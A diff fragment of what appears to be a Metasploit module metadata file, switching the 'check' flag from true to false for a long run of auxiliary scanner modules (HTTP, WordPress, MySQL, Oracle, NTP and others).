    "path": "/modules/auxiliary/scanner/http/trace_axd.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/trace_axd",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30728,7 +30912,7 @@
    "path": "/modules/auxiliary/scanner/http/typo3_bruteforce.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/typo3_bruteforce",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30774,7 +30958,7 @@
    "path": "/modules/auxiliary/scanner/http/vcms_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/vcms_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30820,7 +31004,7 @@
    "path": "/modules/auxiliary/scanner/http/verb_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/verb_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30866,7 +31050,7 @@
    "path": "/modules/auxiliary/scanner/http/vhost_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/vhost_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30913,7 +31097,7 @@
    "path": "/modules/auxiliary/scanner/http/wangkongbao_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wangkongbao_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30959,7 +31143,7 @@
    "path": "/modules/auxiliary/scanner/http/web_vulndb.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/web_vulndb",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31005,7 +31189,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31051,7 +31235,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31097,7 +31281,7 @@
    "path": "/modules/auxiliary/scanner/http/webdav_website_content.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webdav_website_content",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31145,7 +31329,7 @@
    "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/webpagetest_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31194,7 +31378,7 @@
    "path": "/modules/auxiliary/scanner/http/wildfly_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wildfly_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31295,7 +31479,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_cp_calendar_sqli",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31349,7 +31533,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_ghost_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31399,7 +31583,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_login_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_login_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31448,7 +31632,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_multicall_creds",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31499,7 +31683,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_pingback_access.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_pingback_access",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31545,7 +31729,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31593,7 +31777,7 @@
    "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_xmlrpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31693,7 +31877,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_contus_video_gallery_sqli",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31743,7 +31927,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_dukapress_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31791,7 +31975,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_gimedia_library_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31840,7 +32024,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_mobile_pack_info_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31888,7 +32072,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_mobileedition_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -31936,7 +32120,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_nextgen_galley_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -31984,7 +32168,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_simple_backup_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32033,7 +32217,7 @@
    "path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_subscribe_comments_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32079,7 +32263,7 @@
    "path": "/modules/auxiliary/scanner/http/xpath.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/xpath",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32127,7 +32311,7 @@
    "path": "/modules/auxiliary/scanner/http/yaws_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/yaws_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32173,7 +32357,7 @@
    "path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zabbix_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32220,7 +32404,7 @@
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32267,7 +32451,7 @@
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32308,7 +32492,7 @@
    "path": "/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb",
    "is_install_path": true,
    "ref_name": "scanner/ike/cisco_ike_benigncertain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32345,7 +32529,7 @@
    "path": "/modules/auxiliary/scanner/imap/imap_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/imap/imap_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32382,7 +32566,7 @@
    "path": "/modules/auxiliary/scanner/ip/ipidseq.rb",
    "is_install_path": true,
    "ref_name": "scanner/ip/ipidseq",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32424,7 +32608,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_cipher_zero",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32466,7 +32650,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_dumphashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -32504,7 +32688,7 @@
    "path": "/modules/auxiliary/scanner/ipmi/ipmi_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ipmi/ipmi_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32579,7 +32763,7 @@
    "path": "/modules/auxiliary/scanner/kademlia/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/kademlia/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32616,7 +32800,7 @@
    "path": "/modules/auxiliary/scanner/llmnr/query.rb",
    "is_install_path": true,
    "ref_name": "scanner/llmnr/query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32662,7 +32846,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_hashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32708,7 +32892,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32754,7 +32938,7 @@
    "path": "/modules/auxiliary/scanner/lotus/lotus_domino_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/lotus/lotus_domino_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32791,7 +32975,7 @@
    "path": "/modules/auxiliary/scanner/mdns/query.rb",
    "is_install_path": true,
    "ref_name": "scanner/mdns/query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32831,7 +33015,7 @@
    "path": "/modules/auxiliary/scanner/memcached/memcached_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/memcached/memcached_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32868,7 +33052,7 @@
    "path": "/modules/auxiliary/scanner/memcached/memcached_udp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/memcached/memcached_udp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32905,7 +33089,7 @@
    "path": "/modules/auxiliary/scanner/misc/cctv_dvr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/cctv_dvr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -32947,7 +33131,7 @@
    "path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/cisco_smart_install",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -32987,7 +33171,7 @@
    "path": "/modules/auxiliary/scanner/misc/clamav_control.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/clamav_control",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33028,7 +33212,7 @@
    "path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/dahua_dvr_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33076,7 +33260,7 @@
    "path": "/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/dvr_config_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33114,7 +33298,7 @@
    "path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/easycafe_server_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33152,7 +33336,7 @@
    "path": "/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ib_service_mgr_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33189,7 +33373,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_channel_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33226,7 +33410,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33263,7 +33447,7 @@
    "path": "/modules/auxiliary/scanner/misc/ibm_mq_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/ibm_mq_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33302,7 +33486,7 @@
    "path": "/modules/auxiliary/scanner/misc/java_jmx_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/java_jmx_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33342,7 +33526,7 @@
    "path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/java_rmi_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33379,7 +33563,7 @@
    "path": "/modules/auxiliary/scanner/misc/oki_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/oki_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33416,7 +33600,7 @@
    "path": "/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/poisonivy_control_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33454,7 +33638,7 @@
    "path": "/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/raysharp_dvr_passwords",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33491,7 +33675,7 @@
    "path": "/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/rosewill_rxs3211_passwords",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33531,7 +33715,7 @@
    "path": "/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/sercomm_backdoor_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33568,7 +33752,7 @@
    "path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/sunrpc_portmapper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33608,7 +33792,7 @@
    "path": "/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/zenworks_preboot_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33646,7 +33830,7 @@
    "path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mongodb/mongodb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33683,7 +33867,7 @@
    "path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/motorola/timbuktu_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33721,7 +33905,7 @@
    "path": "/modules/auxiliary/scanner/mqtt/connect.rb",
    "is_install_path": true,
    "ref_name": "scanner/mqtt/connect",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33758,7 +33942,7 @@
    "path": "/modules/auxiliary/scanner/msf/msf_rpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/msf/msf_rpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -33805,7 +33989,7 @@
    "path": "/modules/auxiliary/scanner/msf/msf_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/msf/msf_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33848,7 +34032,7 @@
    "path": "/modules/auxiliary/scanner/msmail/exchange_enum.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/exchange_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33891,7 +34075,7 @@
    "path": "/modules/auxiliary/scanner/msmail/host_id.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/host_id",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33934,7 +34118,7 @@
    "path": "/modules/auxiliary/scanner/msmail/onprem_enum.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/onprem_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33979,7 +34163,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34024,7 +34208,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34069,7 +34253,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_ping",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34114,7 +34298,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34154,7 +34338,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34192,7 +34376,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_file_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34229,7 +34413,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34266,7 +34450,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34303,7 +34487,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34340,7 +34524,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34377,7 +34561,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_writable_dirs",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34414,7 +34598,7 @@
    "path": "/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/natpmp/natpmp_portscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34451,7 +34635,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_ntp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34497,7 +34681,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_rest_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34543,7 +34727,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_xmlrpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34589,7 +34773,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_xmlrpc_ping",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34626,7 +34810,7 @@
    "path": "/modules/auxiliary/scanner/netbios/nbname.rb",
    "is_install_path": true,
    "ref_name": "scanner/netbios/nbname",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34672,7 +34856,7 @@
    "path": "/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nexpose/nexpose_api_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34710,7 +34894,7 @@
    "path": "/modules/auxiliary/scanner/nfs/nfsmount.rb",
    "is_install_path": true,
    "ref_name": "scanner/nfs/nfsmount",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34750,7 +34934,7 @@
    "path": "/modules/auxiliary/scanner/nntp/nntp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nntp/nntp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34790,7 +34974,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_monlist.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_monlist",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34831,7 +35015,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_nak_to_the_future",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34870,7 +35054,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_peer_list_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34909,7 +35093,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_peer_list_sum_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34948,7 +35132,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_readvar.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_readvar",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34987,7 +35171,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_req_nonce_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35026,7 +35210,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_reslist_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35065,7 +35249,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_unsettrap_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35111,7 +35295,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_gsad_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35148,7 +35332,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_omp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_omp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35185,7 +35369,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_otp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_otp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35231,7 +35415,7 @@
    "path": "/modules/auxiliary/scanner/oracle/emc_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/emc_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35278,7 +35462,7 @@
    "path": "/modules/auxiliary/scanner/oracle/isqlplus_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/isqlplus_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35325,7 +35509,7 @@
    "path": "/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/isqlplus_sidbrute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35362,7 +35546,7 @@
    "path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -35402,7 +35586,7 @@
    "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35439,7 +35623,7 @@
    "path": "/modules/auxiliary/scanner/oracle/sid_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_brute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35477,7 +35661,7 @@
    "path": "/modules/auxiliary/scanner/oracle/sid_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35523,7 +35707,7 @@
    "path": "/modules/auxiliary/scanner/oracle/spy_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/spy_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35560,7 +35744,7 @@
